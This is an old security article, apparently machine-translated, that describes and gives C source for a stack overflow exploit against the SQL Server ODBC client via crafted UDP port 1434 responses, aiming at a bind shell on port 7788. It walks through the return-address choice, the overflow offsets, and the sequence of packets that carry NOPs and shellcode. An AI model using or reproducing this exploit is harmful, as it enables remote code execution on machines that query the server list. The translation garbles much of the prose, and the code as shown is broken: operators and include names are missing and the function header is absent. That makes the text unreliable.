SQL Server ODBC Stack Overflow Attack.
Create time: 2002-09-28
Article attribute: original
Article submission:
Flashsky (Flashsky1_at_sina.com)
About ODBC overflows finally found a solution.
Since I just wanted to copy the Unicode code, for many reasons, it will result in a large amount of coverage, resulting in some system data coverage, and cannot reach the implementation code, and then I think, can I only override the return address, The return address is directly to our other controlled addresses.
Take carefully, the address of our data is mainly:
1. Recvfrom received data
2. Allocated pile
3. Copying stack
Since the stack is only overwritten to the return address, we have to make a brain 1 and 2, but 1 will be cleared after copying to the heap, so we can use only 2.
Investigate, discover the allocation of its pile, the first time generally 0x11cb00, then consider a variety of situations and Unicode convertible cases, we can set it to the 0x1240FE this address as the return address, as long as the stack is in the following case
[Normal us or someone else's response package] [We covered the address package] [empty exercise package] [shellcode]
0x1240FE between the air operation package
So after the stack overflow, the address points to this position of the heap.
The purpose can be achieved, and the 0x1240Fe is mainly considering that there may be many or SQL Server does not exist, which can be adjusted.
But after the overlay address, since the program continuously processes the package, we will overwrite our address, because the rear empty operation and shellcode are bound together, so it is necessary to have a larger than overflow points, so it has to add 0 This allows the program to process the [we cover the address package] to return it back.
So experiment, success. But finding other machines, I found that I found SP3, while others didn't fight, disassemble their procedures, which is roughly, but its overflow points are different, now the time is 1036 is overwritten Address, modify the overflow point address, OK, all successfully. Below this is an overflow attack demonstration that is compatible with the old new version, waiting for someone to make an ODBC list request to overflow attacks, all Windows machines on our company can basically overflow, but because the shellcode is only In the ODBC process, the back door generated by this process is closed. After overflow, the process is not closed and then the Telnet Host 7788 can go to the process, and of course it can be processed outside the process, and the additional Unicode encoding and Unicode shellcode are slightly. ISNO as needed. An additional number of addresses will change the second operation, and the first time is basically fixed, but the client of the server is generally only the first time with the SQL Server ODBC, so the problem is not very large. There may be more different versions of SQL Server ODBC. Its overflow may not be the same, and it is necessary to analyze the points in the location corresponding to the address overflow package, and pay attention to this point of this point can cause the location of other points. Change because it is to be encoded by Unicode
You can then test the number of local SQL Server, adjust the number of overflow returns (to Unicode encoding) and send the number of empty packages, so that it can basically get it.
#define database 0x61
#include
#include
{
UNSIGNED Char Buffer [7000];
Unsigned char bufhead [3] = {5,0xfc, 0xf};
Unsigned char buf1 [] = "servername; 11111111; instancename; mssqlserver; isclustered; no; version; 8.00.194; TCP; 1433; NP; 11111111 // pipe // sql // query ;;
UNSIGNED Char BUF2 [4092];
UNSIGNED Char BUF3 [1024];
UNSIGNED Char Sendbuf [0x2000];
UNSIGNED CHAR TEMP;
UNSIGNED Char Widecode [9000];
Wsadata wsadata;
Socket sock;
SockAddr_in addr_in;
Handle Listener;
Int E;
INT I;
Int seendlen;
DWORD A1;
Const int SNDBUF = 0;
Const int tcpnodelay = true;
const Int Broadcast = true;
Struct SockAddr_in udpfrom;
INT udpfromlen = sizeof (udpfrom);
Int n;
Unsigned char shellend [4] = {0x4e, 0x4e, 0,0};
Unsigned char myshellcode [] =; unicode shellcode
Unsigned char shellcodehead [70] =; Unicode solution
ShellcodeHead [66] = 0;
Shellcodehead [67] = 0;
IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)
{
Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());
Return False;
}
IF ((Sock = Socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == Invalid_socket
{
Printf ("socket failed.error:% d / n", wsagetlasterror ());
Return False;
}
Sendlen = Widechartomultibyte (0x3a8, wc_compositecheck, shellcodehead, -1, sendbuf, 0x1000, null, null);
Sendlen-;
Memcpy (Sendbuf Sendlen, MyShellcode, Sizeof (MyShellcode) -1);
Sendlen = Sendlen SizeOf (MyShellcode) -1;
I = Widechartomultibyte (0x3a8, wc_compositecheck, shellend, -1, sendbuf sendlen, 0x10, null, null);
Sendlen = sendlen i-1;
MEMSET (BUF2, 0X4, 4092);
MEMSET (BUF3, 0X4, 1024);
BUF2 [3001] = 0x81; // should be 3000, but because of the addition of the old version, make more
BUF2 [3002] = 0xAA;
BUF2 [3003] = 0x12; // The new version of the overflow point will be * 0x1240FE, BUF2 [3004] = 0; // must be added, so that the program is determined that the shellcode is not directly returned. Do not destroy our overflow coverage
BUF2 [512] = 0x2; / / Prevent the old version to take this address to cause an exception
BUF2 [513] = 0x3;
BUF2 [518] = 0x81;
BUF2 [519] = 0xAA;
BUF2 [520] = 0x12; // To take care of the old version of the overflow point; through the Unicode encoding * /
/ / Construct an address overflow package // NOP overflow address
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (1434);
AddR_in.sin_addr.s_un.s_addr = inet_addr ("192.168.0.60");
n = bind (Sock, (SockAddr *) & addr_in, sizeof (addr_in));
IF (n! = 0)
{
e = wsagetlasterror ();
Return -1;
}
For (;;)
{
N = Recvfrom (Sock, Buffer, Sizeof (Buffer), 0, (Struct SockAddr *) & UDPFROM, & UDPFromlen;
* ((Word *) (BUFHEAD 1)) = sizeof (buf1) -1;
Memcpy (buffer, bufhead, 3);
Memcpy (buffer 3, buf1, sizeof (buf1) -1); // Time extension, avoid packing of other interruptions
For (i = 0; i <10; i )
{
N = Sendto (Sock, Buffer, Sizeof (BUF1) 2, 0, (Struct SockAddr *) & UDPFROM, & UDPFromlen;
Sleep (20);
}
Sleep (50);
* ((Word *) (bufhead 1)) = 3005;
Memcpy (buffer, bufhead, 3);
Memcpy (Buffer 3, BUF2, 3005); // Send Address Coverage Pack
N = Sendto (Sock, Buffer, 3008, 0, (struct sockaddr *) & udpfrom, & udpfromlen;
// Write an empty operation string
* ((Word *) (bufhead 1)) = 1024;
Memcpy (buffer, bufhead, 3);
Memcpy (Buffer 3, BUF3, 1024);
For (i = 0; i <10; i )
N = Sendto (Sock, Buffer, 1027, 0, (Struct SockAddr *) & UDPFROM, & UDPFromlen;
// Write shellcode
* ((Word *) (bufhead 1)) = 4092;
Memcpy (buffer, bufhead, 3);
Memcpy (Buffer 3, Sendbuf, 4092);
N = Sendto (Sock, Buffer, 4095, 0, (struct sockaddr *) & udpfrom, & udpfromlen;
}
WSACLEANUP ();
Return 0;
}
